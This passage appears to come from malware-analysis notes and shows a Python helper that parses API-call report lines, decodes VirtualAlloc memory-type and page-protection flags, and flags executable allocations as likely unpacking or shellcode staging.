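    "HeapAlloc": ["hHeap", "dwFlags", "dwBytes"],
    "HeapReAlloc": ["hHeap", "dwFlags", "lpMem", "dwBytes"],
    "HeapFree": ["hHeap", "dwFlags", "lpMem"],
}

# Bit values from winnt.h.
MEM_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
             0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[Optional[int]]   # None where the report printed '?'
    ref: int                    # call-site address in the dumped image


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for lines that are not API entries."""
    m = API_LINE_RE.match(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a.strip(), 16)
            for a in m.group("args").split(",")]
    return ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16))


def parse_api_lines(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def named_params(call: ApiCall) -> Dict[str, Optional[int]]:
    """Leading stack values mapped onto documented parameter names (see assumption above)."""
    return dict(zip(PARAM_NAMES.get(call.func, []), call.args))


def decode_bits(value: int, table: Dict[int, str]) -> List[str]:
    return [name for bit, name in sorted(table.items()) if value & bit]


def describe_virtualalloc(call: ApiCall) -> dict:
    """Decode size, allocation type and page protection of a VirtualAlloc call.
    The low byte of flProtect is the base protection; modifiers such as PAGE_GUARD
    (0x100) sit above it. Any of 0x10/0x20/0x40/0x80 means an executable mapping."""
    p = named_params(call)
    protect = p.get("flProtect")
    base = None if protect is None else protect & 0xFF
    return {
        "ref": call.ref,
        "size": p.get("dwSize"),
        "alloc_type": [] if p.get("flAllocationType") is None
                      else decode_bits(p["flAllocationType"], MEM_TYPES),
        "protect": "?" if base is None else PAGE_PROTECT.get(base, hex(base)),
        "executable": None if base is None else bool(base & 0xF0),
    }


def executable_allocations(calls: List[ApiCall]) -> List[dict]:
    """VirtualAlloc calls requesting an executable protection: the usual signal of an
    unpacker or shellcode stage. The routine above reserves 1 MiB PAGE_READWRITE, so
    it is not flagged."""
    return [d for d in (describe_virtualalloc(c) for c in calls if c.func == "VirtualAlloc")
            if d["executable"]]


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_API_LINES):
        print(f"{call.ref:08X} {call.func}.{call.module} {named_params(call)}")
        if call.func == "VirtualAlloc":
            print("   ", describe_virtualalloc(call))
    print("executable allocations:", executable_allocations(parse_api_lines(SAMPLE_API_LINES)))
```

Run over the entry above, the VirtualAlloc decodes to a 0x100000-byte MEM_RESERVE with PAGE_READWRITE and nothing is flagged; pointing `parse_api_lines` at a whole exported report and keeping only `executable_allocations` is the quick way to find the functions that actually stage code.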